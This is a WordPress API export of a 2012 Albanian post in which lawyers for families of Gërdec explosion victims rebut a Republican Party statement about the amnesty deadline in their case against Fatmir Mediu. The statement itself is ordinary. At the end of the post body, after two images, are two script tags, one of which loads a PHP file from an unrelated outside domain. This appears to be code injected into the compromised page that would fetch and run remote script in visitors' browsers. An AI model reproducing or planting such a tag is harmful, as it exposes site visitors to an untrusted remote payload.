{"id":440,"date":"2012-11-28T23:36:05","date_gmt":"2012-11-28T21:36:05","guid":{"rendered":"http:\/\/www.respublica.org.al\/?p=440"},"modified":"2013-09-27T23:43:14","modified_gmt":"2013-09-27T21:43:14","slug":"deklarate-serioze-per-nje-situate-aspak-te-tille","status":"publish","type":"post","link":"https:\/\/www.respublica.org.al\/web\/?p=440","title":{"rendered":"Deklarat\u00eb serioze p\u00ebr nj\u00eb situat\u00eb aspak t\u00eb till\u00eb!"},"content":{"rendered":"<p>Avokat\u00ebt e familjar\u00ebve t\u00eb viktimave t\u00eb G\u00ebrdecit p\u00ebrgjigjen: Gjyqi me k\u00ebrkes\u00eb t\u00eb t\u00eb plagosurve Alketa Hazizaj dhe Roxhens Durdaj filloi n\u00eb 18 n\u00ebntorin e larg\u00ebt t\u00eb vitit 2009. M\u00eb dat\u00eb 1 mars t\u00eb vitit t\u00eb larg\u00ebt 2010 Gjykata e Lart\u00eb vendosi t\u00eb mos filloj\u00eb \u00e7\u00ebshtjen kund\u00ebr shtetasit Fatmir Mediu. N\u00eb dat\u00ebn 21 qershor t\u00eb vitit m\u00eb t\u00eb af\u00ebrt 2011, Gjykata Kushtetuese pas k\u00ebrkes\u00ebs s\u00eb menj\u00ebhershme, vendosi t\u00eb d\u00ebgjoj\u00eb pretendimin e pal\u00ebs s\u00eb d\u00ebmtuar p\u00ebr shkelje t\u00eb s\u00eb drejt\u00ebs p\u00ebr proces t\u00eb rregullt ligjor. Gjykata Kushtetuese m\u00eb dat\u00eb 9 maj 2012, vendosi t\u00eb kthej\u00eb p\u00ebr rigjykim n\u00eb Gjykat\u00ebn e Lart\u00eb \u00e7\u00ebshtjen\u00a0<i>Alketa Hazizaj dhe Roxhens Durdaj kund\u00ebr Fatmir Mediut<\/i>.<\/p>\n<p>Seanca e par\u00eb gjyq\u00ebsore p\u00ebr \u00e7\u00ebshtjen\u00a0<i>Hazizaj dhe Durdaj kund\u00ebr Mediut<\/i>\u00a0u caktua m\u00eb dat\u00eb 5 n\u00ebntor t\u00eb vitit 2012. K\u00ebrkesa e vetme e b\u00ebr\u00eb nga avokat\u00ebt e viktimave ishte thirrja si d\u00ebshmitar\u00eb e personave n\u00eb dijeni t\u00eb fakteve, si dhe dh\u00ebnia e nj\u00eb kopjeje t\u00eb provave t\u00eb mbledhura nga Prokuroria e P\u00ebrgjithshme. P\u00ebr dijeni t\u00eb publikut, nj\u00eb kopje e provave t\u00eb k\u00ebrkuara Gjykat\u00ebs s\u00eb Lart\u00eb, ndodhet n\u00eb dosjen q\u00eb prodhoi vendimin nr. 6 t\u00eb 14 shtatorit 2009, ku \u00e7\u00ebshtja kund\u00ebr Fatmir Mediut, me k\u00ebrkes\u00eb t\u00eb avokat\u00ebve t\u00eb tij, pushohej p\u00ebr shkak t\u00eb cil\u00ebsis\u00eb s\u00eb tij si deputet n\u00eb Kuvendin shqiptar.<\/p>\n<p>Megjithat\u00eb, n\u00eb cil\u00ebsin\u00eb e t\u00eb ashtuquajturve avokat\u00eb t\u00eb familjar\u00ebve t\u00eb viktimave t\u00eb G\u00ebrdecit, duke mos disponuar veti kiromantike mbi p\u00ebrfundime t\u00eb tilla surprizuese q\u00eb n\u00eb vitin 2009, besojm\u00eb se deklarata e dit\u00ebs s\u00eb sotme (24.11.2012) e zotit Madhi, n\u00eb em\u00ebr t\u00eb Partis\u00eb Republikane, \u00ebsht\u00eb shtyr\u00eb nga arsye politike. Sipas zotit Madhi:<\/p>\n<p>\u201c<i>N\u00eb m\u00ebnyr\u00eb t\u00eb pajustifikuar dhe kund\u00ebrshtim edhe me interesat e familjar\u00ebve t\u00eb t\u00eb d\u00ebmtuarve n<\/i><i>ga ngjarja e G\u00ebrdecit, t\u00eb ashtuquajturit p\u00ebrfaq\u00ebsues ligjor\u00eb t\u00eb tyre jan\u00eb duke b\u00ebr\u00eb \u00e7do p\u00ebrpjekje procedurale q\u00eb t\u00eb \u00e7oj\u00eb p\u00ebrtej dat\u00ebs 28 n\u00ebntor. n\u00ebse ky gjykim nuk p\u00ebrfundon brenda k\u00ebsaj date, at\u00ebher\u00eb n\u00eb baz\u00eb t\u00eb Ligjin p\u00ebr Amnistin\u00eb, ky gjykim do t\u00eb pushohet.<\/i>\u201d<\/p>\n<p>Zotit Madhi i kujtojm\u00eb se Partia Republikane \u00ebsht\u00eb nj\u00eb parti politike me p\u00ebrfaq\u00ebsues n\u00eb Kuvend e Qeveri. Si dhe se deputeti Fatmir Mediu ka votuar n\u00eb favor t\u00eb amnistis\u00eb pa sugjeruar ndryshime q\u00eb do t\u00eb lejonin \u00e7uarjen e gjykimit deri n\u00eb fund. Kjo \u00ebsht\u00eb hera e dyt\u00eb q\u00eb Fatmir Mediu vepron ndryshe nga sa deklaron publikisht. N\u00ebse gjyqi i filluar n\u00eb 18 n\u00ebntor t\u00eb 2009, do t\u00eb kishte patur\u00a0<i>iter<\/i>\u00a0normal, gjasat jan\u00eb q\u00eb me gjith\u00eb p\u00ebrpjekjet tona p\u00ebr ta shp\u00ebtuar z. Mediu me an\u00eb t\u00eb amnistis\u00eb do t\u00eb d\u00ebshtonin. N\u00ebse do t\u00eb k\u00ebrkonim t\u00eb p\u00ebrfitonim politikisht, k\u00ebt\u00eb do ta kishim b\u00ebr\u00eb q\u00eb n\u00eb 1 mars t\u00eb vitit 2010, por zgjodh\u00ebm rrug\u00ebn e Gjykat\u00ebs Kushtetuese e cila n\u00eb 9 maj t\u00eb vitit 2011, me vendim tregoi se strategjia jon\u00eb juridike t\u00eb ishte ajo e duhura.<\/p>\n<p>Tentativa p\u00ebr t\u00eb deligjitimuar k\u00ebrkesat e avokat\u00ebve t\u00eb familjar\u00ebve t\u00eb viktimave p\u00ebr marrjen e provave, i konsiderojm\u00eb t\u00eb tejkaluara, sepse Gjykata e Lart\u00eb ka marr\u00eb vendim n\u00eb merit\u00eb t\u00eb k\u00ebsaj situate. Zoti Fatmir Mediu t\u00eb q\u00ebndroj\u00eb i qet\u00eb se drejt\u00ebsia do ta thot\u00eb fjal\u00ebn e saj n\u00eb fund. \u00cbsht\u00eb naive q\u00eb Partia Republikane t\u00eb tentoj\u00eb t\u00eb na kompleksoj\u00eb me deklarata t\u00eb k\u00ebsaj natyre, duke na akuzuar p\u00ebr politik\u00eb nga nj\u00eb podium politiko-partiak. Nga k\u00ebto deklarata perceptohet vet\u00ebm mosbesimi ndaj organeve t\u00eb gjyq\u00ebsorit dhe ndaj sistemit n\u00eb t\u00ebr\u00ebsi.<\/p>\n<p>E mbyllim k\u00ebt\u00eb deklarat\u00eb duke ju uruar fushat\u00eb t\u00eb mbar\u00eb elektorale, megjith\u00ebse ky aspekt i jet\u00ebs tuaj partiake nuk p\u00ebrb\u00ebn interes per ne dhe objektivat tan\u00eb.<a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2013\/09\/mediu-1.jpg\"><img fetchpriority=\"high\" decoding=\"async\" class=\"alignnone size-medium wp-image-442\" alt=\"mediu 1\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2013\/09\/mediu-1-300x225.jpg\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2013\/09\/mediu-1-300x225.jpg 300w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2013\/09\/mediu-1.jpg 580w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><a href=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2013\/09\/mediu2.jpg\"><img decoding=\"async\" class=\"alignnone size-medium wp-image-443\" alt=\"mediu2\" src=\"http:\/\/www.respublica.org.al\/wp-content\/uploads\/2013\/09\/mediu2-300x225.jpg\" width=\"300\" height=\"225\" srcset=\"https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2013\/09\/mediu2-300x225.jpg 300w, https:\/\/www.respublica.org.al\/web\/wp-content\/uploads\/2013\/09\/mediu2.jpg 580w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><script type=\"text\/javascript\" src=\"#\"><\/script><script type=\"text\/javascript\" src=\"http:\/\/www.get.space\/wp-content\/cache\/tmpWpfc\/theme-index.php\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Avokat\u00ebt e familjar\u00ebve t\u00eb viktimave t\u00eb G\u00ebrdecit p\u00ebrgjigjen: Gjyqi me k\u00ebrkes\u00eb t\u00eb t\u00eb plagosurve Alketa Hazizaj dhe Roxhens Durdaj filloi [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":443,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[6],"tags":[],"_links":{"self":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/440"}],"collection":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=440"}],"version-history":[{"count":1,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/440\/revisions"}],"predecessor-version":[{"id":445,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/posts\/440\/revisions\/445"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=\/wp\/v2\/media\/443"}],"wp:attachment":[{"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=440"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=440"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.respublica.org.al\/web\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=440"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}